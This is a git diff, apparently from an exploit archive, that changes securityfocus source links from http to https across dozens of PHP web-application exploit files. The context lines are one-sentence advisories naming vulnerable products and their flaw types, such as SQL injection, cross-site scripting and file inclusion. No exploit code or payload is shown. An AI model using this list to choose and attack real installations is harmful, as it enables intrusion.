@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18713/info +source: https://www.securityfocus.com/bid/18713/info The 'phpclassifieds.info' product is prone to multiple input-validation vulnerabilities. The issues include HTML- and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28131.txt b/exploits/php/webapps/28131.txt index 0d72c5baf..a85c80d78 100644 --- a/exploits/php/webapps/28131.txt +++ b/exploits/php/webapps/28131.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18721/info +source: https://www.securityfocus.com/bid/18721/info PHP iCalender is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28132.txt b/exploits/php/webapps/28132.txt index b1089c374..55ce7e3b8 100644 --- a/exploits/php/webapps/28132.txt +++ b/exploits/php/webapps/28132.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18726/info +source: https://www.securityfocus.com/bid/18726/info NewsPHP 2006 PRO is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28133.txt b/exploits/php/webapps/28133.txt index a6135fbe5..6614c3aa3 100644 --- a/exploits/php/webapps/28133.txt +++ b/exploits/php/webapps/28133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18726/info +source: https://www.securityfocus.com/bid/18726/info NewsPHP 2006 PRO is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/28134.txt b/exploits/php/webapps/28134.txt index 9865facab..0be6a97ac 100644 --- a/exploits/php/webapps/28134.txt +++ b/exploits/php/webapps/28134.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18726/info +source: https://www.securityfocus.com/bid/18726/info NewsPHP 2006 PRO is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28136.pl b/exploits/php/webapps/28136.pl index e0746310b..96dab1ebb 100755 --- a/exploits/php/webapps/28136.pl +++ b/exploits/php/webapps/28136.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18729/info +source: https://www.securityfocus.com/bid/18729/info Vincent-Leclercq News is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28137.txt b/exploits/php/webapps/28137.txt index 7f44aa550..9a4dcc469 100644 --- a/exploits/php/webapps/28137.txt +++ b/exploits/php/webapps/28137.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18735/info +source: https://www.securityfocus.com/bid/18735/info Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28138.txt b/exploits/php/webapps/28138.txt index 8109f53d9..8f358cfd2 100644 --- a/exploits/php/webapps/28138.txt +++ b/exploits/php/webapps/28138.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18735/info +source: https://www.securityfocus.com/bid/18735/info Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28139.txt b/exploits/php/webapps/28139.txt index fc3e816fc..a7f053571 100644 --- a/exploits/php/webapps/28139.txt +++ b/exploits/php/webapps/28139.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18735/info +source: https://www.securityfocus.com/bid/18735/info Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28140.txt b/exploits/php/webapps/28140.txt index cbb330a1c..7b4328c69 100644 --- a/exploits/php/webapps/28140.txt +++ b/exploits/php/webapps/28140.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18735/info +source: https://www.securityfocus.com/bid/18735/info Softbiz Banner Exchange is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28141.txt b/exploits/php/webapps/28141.txt index 0609bcd4b..8a7662c28 100644 --- a/exploits/php/webapps/28141.txt +++ b/exploits/php/webapps/28141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18756/info +source: https://www.securityfocus.com/bid/18756/info SiteBuilder-FX is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28142.txt b/exploits/php/webapps/28142.txt index b7a797aa1..e3ba9961f 100644 --- a/exploits/php/webapps/28142.txt +++ b/exploits/php/webapps/28142.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18760/info +source: https://www.securityfocus.com/bid/18760/info Diesel Joke Site is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28143.pl b/exploits/php/webapps/28143.pl index 01a183a11..fa5d2a2c5 100755 --- a/exploits/php/webapps/28143.pl +++ b/exploits/php/webapps/28143.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18764/info +source: https://www.securityfocus.com/bid/18764/info SturGeoN Upload is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/28146.txt b/exploits/php/webapps/28146.txt index 0ab197e67..907ff00d0 100644 --- a/exploits/php/webapps/28146.txt +++ b/exploits/php/webapps/28146.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18775/info +source: https://www.securityfocus.com/bid/18775/info Vincent Leclercq News is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28147.txt b/exploits/php/webapps/28147.txt index 10e820f5b..cf7e9e24e 100644 --- a/exploits/php/webapps/28147.txt +++ b/exploits/php/webapps/28147.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28148.txt b/exploits/php/webapps/28148.txt index 5a7df01dd..d8075c11e 100644 --- a/exploits/php/webapps/28148.txt +++ b/exploits/php/webapps/28148.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28149.txt b/exploits/php/webapps/28149.txt index 4571e1d66..d24c0bac7 100644 --- a/exploits/php/webapps/28149.txt +++ b/exploits/php/webapps/28149.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28150.txt b/exploits/php/webapps/28150.txt index 3eab9ee53..e74cc8a92 100644 --- a/exploits/php/webapps/28150.txt +++ b/exploits/php/webapps/28150.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18788/info +source: https://www.securityfocus.com/bid/18788/info The free QBoard script is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28151.txt b/exploits/php/webapps/28151.txt index d39be360e..7fbb2a404 100644 --- a/exploits/php/webapps/28151.txt +++ b/exploits/php/webapps/28151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28152.txt b/exploits/php/webapps/28152.txt index 3159dc6cb..f02458f27 100644 --- a/exploits/php/webapps/28152.txt +++ b/exploits/php/webapps/28152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/28153.txt b/exploits/php/webapps/28153.txt index 1dca012d7..4df0f4a81 100644 --- a/exploits/php/webapps/28153.txt +++ b/exploits/php/webapps/28153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28154.txt b/exploits/php/webapps/28154.txt index 74f52ec08..492fbc1ac 100644 --- a/exploits/php/webapps/28154.txt +++ b/exploits/php/webapps/28154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28155.txt b/exploits/php/webapps/28155.txt index 847cb90ee..957ebeaef 100644 --- a/exploits/php/webapps/28155.txt +++ b/exploits/php/webapps/28155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28156.txt b/exploits/php/webapps/28156.txt index 424eb9dbd..765682e81 100644 --- a/exploits/php/webapps/28156.txt +++ b/exploits/php/webapps/28156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28157.txt b/exploits/php/webapps/28157.txt index 9a145075c..618ce7c05 100644 --- a/exploits/php/webapps/28157.txt +++ b/exploits/php/webapps/28157.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18790/info +source: https://www.securityfocus.com/bid/18790/info VirtuaStore is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28158.txt b/exploits/php/webapps/28158.txt index 184da1fec..0f20393ec 100644 --- a/exploits/php/webapps/28158.txt +++ b/exploits/php/webapps/28158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18791/info +source: https://www.securityfocus.com/bid/18791/info QTO File Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28159.txt b/exploits/php/webapps/28159.txt index 083cb9239..ad1757d42 100644 --- a/exploits/php/webapps/28159.txt +++ b/exploits/php/webapps/28159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18792/info +source: https://www.securityfocus.com/bid/18792/info Glossaire is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28161.txt b/exploits/php/webapps/28161.txt index 9a5be86d6..9e81b2242 100644 --- a/exploits/php/webapps/28161.txt +++ b/exploits/php/webapps/28161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18798/info +source: https://www.securityfocus.com/bid/18798/info PhpWebGallery is prone to a cross-site scripting vulnerability because it fails to sanitize input before displaying it to users of the application. diff --git a/exploits/php/webapps/28162.txt b/exploits/php/webapps/28162.txt index 8ded4ef4a..071b6864e 100644 --- a/exploits/php/webapps/28162.txt +++ b/exploits/php/webapps/28162.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18809/info +source: https://www.securityfocus.com/bid/18809/info Randshop is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28163.txt b/exploits/php/webapps/28163.txt index 48816bcab..a67ec5e54 100644 --- a/exploits/php/webapps/28163.txt +++ b/exploits/php/webapps/28163.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18819/info +source: https://www.securityfocus.com/bid/18819/info PostNuke is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28166.pl b/exploits/php/webapps/28166.pl index 667ac6b6d..233c1fdd1 100755 --- a/exploits/php/webapps/28166.pl +++ b/exploits/php/webapps/28166.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18835/info +source: https://www.securityfocus.com/bid/18835/info LifeType is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28167.txt b/exploits/php/webapps/28167.txt index 5910e2536..2520846fb 100644 --- a/exploits/php/webapps/28167.txt +++ b/exploits/php/webapps/28167.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18836/info +source: https://www.securityfocus.com/bid/18836/info Invision Power Board is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28168.txt b/exploits/php/webapps/28168.txt index 6ec8e80c4..feead3fd7 100644 --- a/exploits/php/webapps/28168.txt +++ b/exploits/php/webapps/28168.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18837/info +source: https://www.securityfocus.com/bid/18837/info Blog:CMS is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28176.txt b/exploits/php/webapps/28176.txt index d7c8ee1d3..aecfc31f6 100644 --- a/exploits/php/webapps/28176.txt +++ b/exploits/php/webapps/28176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18857/info +source: https://www.securityfocus.com/bid/18857/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28177.txt b/exploits/php/webapps/28177.txt index b5d0d065b..4d3287653 100644 --- a/exploits/php/webapps/28177.txt +++ b/exploits/php/webapps/28177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18857/info +source: https://www.securityfocus.com/bid/18857/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28178.txt b/exploits/php/webapps/28178.txt index 2e19fc7e9..0612b76f6 100644 --- a/exploits/php/webapps/28178.txt +++ b/exploits/php/webapps/28178.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18857/info +source: https://www.securityfocus.com/bid/18857/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28179.txt b/exploits/php/webapps/28179.txt index c3d9760e6..ab5aa11b5 100644 --- a/exploits/php/webapps/28179.txt +++ b/exploits/php/webapps/28179.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18857/info +source: https://www.securityfocus.com/bid/18857/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28180.txt b/exploits/php/webapps/28180.txt index 4d706cd45..b54cede98 100644 --- a/exploits/php/webapps/28180.txt +++ b/exploits/php/webapps/28180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18857/info +source: https://www.securityfocus.com/bid/18857/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28190.txt b/exploits/php/webapps/28190.txt index 8c9f32e81..e7503e1b1 100644 --- a/exploits/php/webapps/28190.txt +++ b/exploits/php/webapps/28190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18876/info +source: https://www.securityfocus.com/bid/18876/info ExtCalendar is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28192.txt b/exploits/php/webapps/28192.txt index 9061cf844..c510eece1 100644 --- a/exploits/php/webapps/28192.txt +++ b/exploits/php/webapps/28192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18898/info +source: https://www.securityfocus.com/bid/18898/info ATutor is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28195.txt b/exploits/php/webapps/28195.txt index d453b3c60..0333f05a9 100644 --- a/exploits/php/webapps/28195.txt +++ b/exploits/php/webapps/28195.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18901/info +source: https://www.securityfocus.com/bid/18901/info RW::Download is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28199.txt b/exploits/php/webapps/28199.txt index 746e7ba79..4c3e77de3 100644 --- a/exploits/php/webapps/28199.txt +++ b/exploits/php/webapps/28199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18914/info +source: https://www.securityfocus.com/bid/18914/info phpBB for Mambo is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28200.txt b/exploits/php/webapps/28200.txt index 0236044fe..ee8696fb7 100644 --- a/exploits/php/webapps/28200.txt +++ b/exploits/php/webapps/28200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18925/info +source: https://www.securityfocus.com/bid/18925/info Farsinews is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28201.txt b/exploits/php/webapps/28201.txt index 324cf6fcb..8a8c601d7 100644 --- a/exploits/php/webapps/28201.txt +++ b/exploits/php/webapps/28201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18928/info +source: https://www.securityfocus.com/bid/18928/info Graffiti Forums is prone to an SQL-injection vulnerability. diff --git a/exploits/php/webapps/28204.txt b/exploits/php/webapps/28204.txt index 02bb48f22..3db4b14e8 100644 --- a/exploits/php/webapps/28204.txt +++ b/exploits/php/webapps/28204.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18934/info +source: https://www.securityfocus.com/bid/18934/info SaPHPLesson is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28205.txt b/exploits/php/webapps/28205.txt index 67ee0dcd2..bc7fa5810 100644 --- a/exploits/php/webapps/28205.txt +++ b/exploits/php/webapps/28205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18936/info +source: https://www.securityfocus.com/bid/18936/info FlexWATCH Network Camera is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28206.txt b/exploits/php/webapps/28206.txt index 16d56ad50..6b57bbee0 100644 --- a/exploits/php/webapps/28206.txt +++ b/exploits/php/webapps/28206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18942/info +source: https://www.securityfocus.com/bid/18942/info Fantastic GuestBook is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/28211.txt b/exploits/php/webapps/28211.txt index 3e8b7e1de..3dc2fa344 100644 --- a/exploits/php/webapps/28211.txt +++ b/exploits/php/webapps/28211.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18956/info +source: https://www.securityfocus.com/bid/18956/info Lazarus Guestbook is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28212.txt b/exploits/php/webapps/28212.txt index e25d9f4e1..302514146 100644 --- a/exploits/php/webapps/28212.txt +++ b/exploits/php/webapps/28212.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18956/info +source: https://www.securityfocus.com/bid/18956/info Lazarus Guestbook is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28214.txt b/exploits/php/webapps/28214.txt index 38d318a98..beb334a03 100644 --- a/exploits/php/webapps/28214.txt +++ b/exploits/php/webapps/28214.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18964/info +source: https://www.securityfocus.com/bid/18964/info Photocycle is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28215.txt b/exploits/php/webapps/28215.txt index 2fca48b79..0b0c58970 100644 --- a/exploits/php/webapps/28215.txt +++ b/exploits/php/webapps/28215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18965/info +source: https://www.securityfocus.com/bid/18965/info PHP Event Calendar is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28216.txt b/exploits/php/webapps/28216.txt index 6d5ed0196..cf0a01a26 100644 --- a/exploits/php/webapps/28216.txt +++ b/exploits/php/webapps/28216.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18966/info +source: https://www.securityfocus.com/bid/18966/info FlatNuke is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28217.txt b/exploits/php/webapps/28217.txt index a3bea3d27..e1eebeb10 100644 --- a/exploits/php/webapps/28217.txt +++ b/exploits/php/webapps/28217.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18967/info +source: https://www.securityfocus.com/bid/18967/info Forum 5 is prone to a local file-include vulnerability. diff --git a/exploits/php/webapps/28219.txt b/exploits/php/webapps/28219.txt index 3b7cbff3e..956ebad86 100644 --- a/exploits/php/webapps/28219.txt +++ b/exploits/php/webapps/28219.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18970/info +source: https://www.securityfocus.com/bid/18970/info Koobi Pro prone to a cross-site scripting issue and an SQL-injection issue because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28223.txt b/exploits/php/webapps/28223.txt index f9f8c9590..672d56b6b 100644 --- a/exploits/php/webapps/28223.txt +++ b/exploits/php/webapps/28223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18990/info +source: https://www.securityfocus.com/bid/18990/info SubberZ[Lite] is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28229.txt b/exploits/php/webapps/28229.txt index b273a9ad3..430567023 100644 --- a/exploits/php/webapps/28229.txt +++ b/exploits/php/webapps/28229.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19002/info +source: https://www.securityfocus.com/bid/19002/info VisNetic Mail Server is prone to multiple local file-include vulnerabilities and a remote file includes vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28231.txt b/exploits/php/webapps/28231.txt index ae0599b01..9ce4520a8 100644 --- a/exploits/php/webapps/28231.txt +++ b/exploits/php/webapps/28231.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19014/info +source: https://www.securityfocus.com/bid/19014/info ListMessenger is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28233.txt b/exploits/php/webapps/28233.txt index 4d9cd62b9..e7602976d 100644 --- a/exploits/php/webapps/28233.txt +++ b/exploits/php/webapps/28233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19027/info +source: https://www.securityfocus.com/bid/19027/info The Calendar module for Mambo is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28247.txt b/exploits/php/webapps/28247.txt index be67c3650..d69ead087 100644 --- a/exploits/php/webapps/28247.txt +++ b/exploits/php/webapps/28247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19083/info +source: https://www.securityfocus.com/bid/19083/info PHPLinkExchange is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28248.txt b/exploits/php/webapps/28248.txt index fd7093fea..6aebbe32a 100644 --- a/exploits/php/webapps/28248.txt +++ b/exploits/php/webapps/28248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19084/info +source: https://www.securityfocus.com/bid/19084/info PHPHostBot is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28249.txt b/exploits/php/webapps/28249.txt index 12b1c2218..d12889dbe 100644 --- a/exploits/php/webapps/28249.txt +++ b/exploits/php/webapps/28249.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19093/info +source: https://www.securityfocus.com/bid/19093/info GeodesicSolutions products are prone to multiple SQL-injection vulnerabilities because the applications fail to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28250.txt b/exploits/php/webapps/28250.txt index fa3c51a5c..709455880 100644 --- a/exploits/php/webapps/28250.txt +++ b/exploits/php/webapps/28250.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19093/info +source: https://www.securityfocus.com/bid/19093/info GeodesicSolutions products are prone to multiple SQL-injection vulnerabilities because the applications fail to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28251.txt b/exploits/php/webapps/28251.txt index 9d4753682..b63513d15 100644 --- a/exploits/php/webapps/28251.txt +++ b/exploits/php/webapps/28251.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19095/info +source: https://www.securityfocus.com/bid/19095/info MiniBB is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28253.txt b/exploits/php/webapps/28253.txt index 6f2af823f..629e21fff 100644 --- a/exploits/php/webapps/28253.txt +++ b/exploits/php/webapps/28253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19105/info +source: https://www.securityfocus.com/bid/19105/info Advanced Poll is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28255.txt b/exploits/php/webapps/28255.txt index 43838c116..0b3aeece6 100644 --- a/exploits/php/webapps/28255.txt +++ b/exploits/php/webapps/28255.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19107/info +source: https://www.securityfocus.com/bid/19107/info Chameleon LE is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28260.txt b/exploits/php/webapps/28260.txt index 3c7ebce08..459f2001f 100644 --- a/exploits/php/webapps/28260.txt +++ b/exploits/php/webapps/28260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19127/info +source: https://www.securityfocus.com/bid/19127/info Vanilla is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28261.txt b/exploits/php/webapps/28261.txt index 63832da22..8cfcf1947 100644 --- a/exploits/php/webapps/28261.txt +++ b/exploits/php/webapps/28261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19128/info +source: https://www.securityfocus.com/bid/19128/info Multiple Rad Scripts products are prone to an authentication-bypass vulnerability. These issues occur because the applications fail to prevent an attacker from accessing admin scripts directly without requiring authentication. diff --git a/exploits/php/webapps/28262.txt b/exploits/php/webapps/28262.txt index e989672af..4432ab282 100644 --- a/exploits/php/webapps/28262.txt +++ b/exploits/php/webapps/28262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19129/info +source: https://www.securityfocus.com/bid/19129/info MusicBox is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28264.txt b/exploits/php/webapps/28264.txt index 0390e4b30..852760817 100644 --- a/exploits/php/webapps/28264.txt +++ b/exploits/php/webapps/28264.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19138/info +source: https://www.securityfocus.com/bid/19138/info Prince Clan Chess Club for Mambo is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28267.txt b/exploits/php/webapps/28267.txt index c66bcad86..fd6216abd 100644 --- a/exploits/php/webapps/28267.txt +++ b/exploits/php/webapps/28267.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19149/info +source: https://www.securityfocus.com/bid/19149/info LinksCaffe is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28268.txt b/exploits/php/webapps/28268.txt index 9d5671a9d..bd8884962 100644 --- a/exploits/php/webapps/28268.txt +++ b/exploits/php/webapps/28268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19149/info +source: https://www.securityfocus.com/bid/19149/info LinksCaffe is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28269.txt b/exploits/php/webapps/28269.txt index 48d54f152..8be9527b1 100644 --- a/exploits/php/webapps/28269.txt +++ b/exploits/php/webapps/28269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19149/info +source: https://www.securityfocus.com/bid/19149/info LinksCaffe is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
